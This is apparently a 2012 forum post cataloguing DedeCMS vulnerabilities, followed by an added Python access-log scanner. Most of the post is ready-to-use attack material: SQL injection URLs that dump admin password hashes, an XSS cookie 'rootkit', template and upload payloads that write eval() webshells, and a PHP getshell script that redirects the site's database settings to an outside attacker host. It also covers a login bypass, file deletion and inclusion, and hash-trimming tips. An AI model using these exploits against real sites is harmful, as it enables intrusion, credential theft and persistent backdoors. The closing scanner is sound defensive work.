DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability

Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

This generates x.php with password xiao, writing a one-line webshell directly.

DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage parameter XSS vulnerability

1. Copy and paste the URL below into the browser. It triggers the XSS and installs the XSS rootkit; note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be disabled.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, visiting any of the URLs below triggers our XSS, however the page is reached.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns the first response line; "OK" beyond offset 12 is the "HTTP/1.1 200 OK" status line.
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // The _COOKIE[GLOBALS][cfg_*] fields override the site's database settings through the variable override bug.
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        exit;
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

The precondition is that the backend path must be known first.

DedeCMS (织梦) tag remote file write vulnerability

Prerequisite: you must have your own dede database prepared, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability

1. Register a user, enter the member area, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:

uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and build a form:

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two fields are the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path.

3. Visit the edited article. Assuming the article just edited has aid 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is generated in the plus directory.

DedeCMS website management system getshell vulnerability (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save this as 1.gif.

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The stored password is a 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5 value; from that, remove 3 characters from the front and 1 from the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability

This exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS writing the database error message into a PHP file without validating the file header.

1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

An error message is shown.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking confirm, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
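A defender-side access-log scanner for the request patterns catalogued across this post: the _COOKIE[GLOBALS] / _POST[GLOBALS] / _Cs[ variable override, the updatexml() and union select error-based injections, the raw sql= parameter of advancedsearch.php, the gotopage <script> payload, the ../ traversal in edit_face.php, and the PHP tags sent to digg_frame.php. This is an added example, not code from the original post or from DedeCMS; it assumes combined-log lines with one extra trailing quoted Cookie field, and the log lines, the 10.0.0.x client addresses and the 203.0.113.9 host are constructed placeholders.

```python
"""Flag the DedeCMS exploit request patterns catalogued above in access logs."""
import re
from urllib.parse import unquote_plus

# Signatures derived from the payloads above; each is matched against the
# URL-decoded request target plus the Cookie header (if the log records one).
SIGNATURES = [
    # _COOKIE[GLOBALS][cfg_dbhost]=..., _POST[GLOBALS][...]=..., _Cs[...]=..., cfg_basedir=...
    ("variable_override",
     re.compile(r"(?:^|[?&;\s])_[A-Za-z]+\[|(?:^|[?&\[])(?:GLOBALS|cfg_[a-z]+)[\[=\]]", re.I)),
    ("error_based_sqli",
     re.compile(r"\bupdatexml\s*\(|\bunion\s+(?:all\s+)?select\b|\bfrom\s+dede_admin\b", re.I)),
    ("raw_sql_param", re.compile(r"advancedsearch\.php\?.*\bsql=", re.I)),
    ("template_tag", re.compile(r"\{/?dede:", re.I)),
    ("reflected_script", re.compile(r"<script\b|\beval\s*\(", re.I)),
    ("php_tag_in_param", re.compile(r"<\?php|\?>", re.I)),
    ("path_traversal", re.compile(r"(?:oldface|code)=[^&]*\.\./", re.I)),
]

# Combined log format plus one extra quoted field for the Cookie header ("-" if none).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "[^"]*")?(?: "(?P<cookie>[^"]*)")?'
)


def classify(target: str, cookie: str = "") -> list[str]:
    """Return the names of all signatures that match one request."""
    # Decode twice so %5B becomes [ and a double-encoded payload still surfaces.
    text = unquote_plus(unquote_plus(target + "\n" + cookie))
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_log(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, client IP, matched signatures) for every flagged line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        cookie = m["cookie"] if m["cookie"] not in (None, "-") else ""
        sigs = classify(m["target"], cookie)
        if sigs:
            hits.append((lineno, m["ip"], sigs))
    return hits


# Constructed sample log: line 1 is benign traffic, the rest mirror the payloads above.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
10.0.0.7 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23'][0]=1 HTTP/1.1" 500 312 "-" "Mozilla/5.0" "-"
10.0.0.7 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0" "-"
10.0.0.7 - - [18/Oct/2012:10:42:40 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 901 "-" "Mozilla/5.0" "-"
10.0.0.8 - - [18/Oct/2012:10:43:02 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 2210 "-" "Mozilla/5.0" "-"
10.0.0.8 - - [18/Oct/2012:10:43:15 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 77 "-" "Mozilla/5.0" "-"
10.0.0.9 - - [18/Oct/2012:10:43:40 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0" "_COOKIE[GLOBALS][cfg_dbhost]=203.0.113.9; _COOKIE[GLOBALS][cfg_dbuser]=exploit"
10.0.0.9 - - [18/Oct/2012:10:43:55 +0800] "GET /plus/digg_frame.php?aid=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?%3E HTTP/1.1" 200 40 "-" "Mozilla/5.0" "-"
"""

if __name__ == "__main__":
    for lineno, ip, sigs in scan_log(SAMPLE_LOG):
        print(f"line {lineno} {ip}: {', '.join(sigs)}")
```

A real deployment should feed the decoded POST body as well, since the mytag_js.php override travels in the form data that access logs do not record.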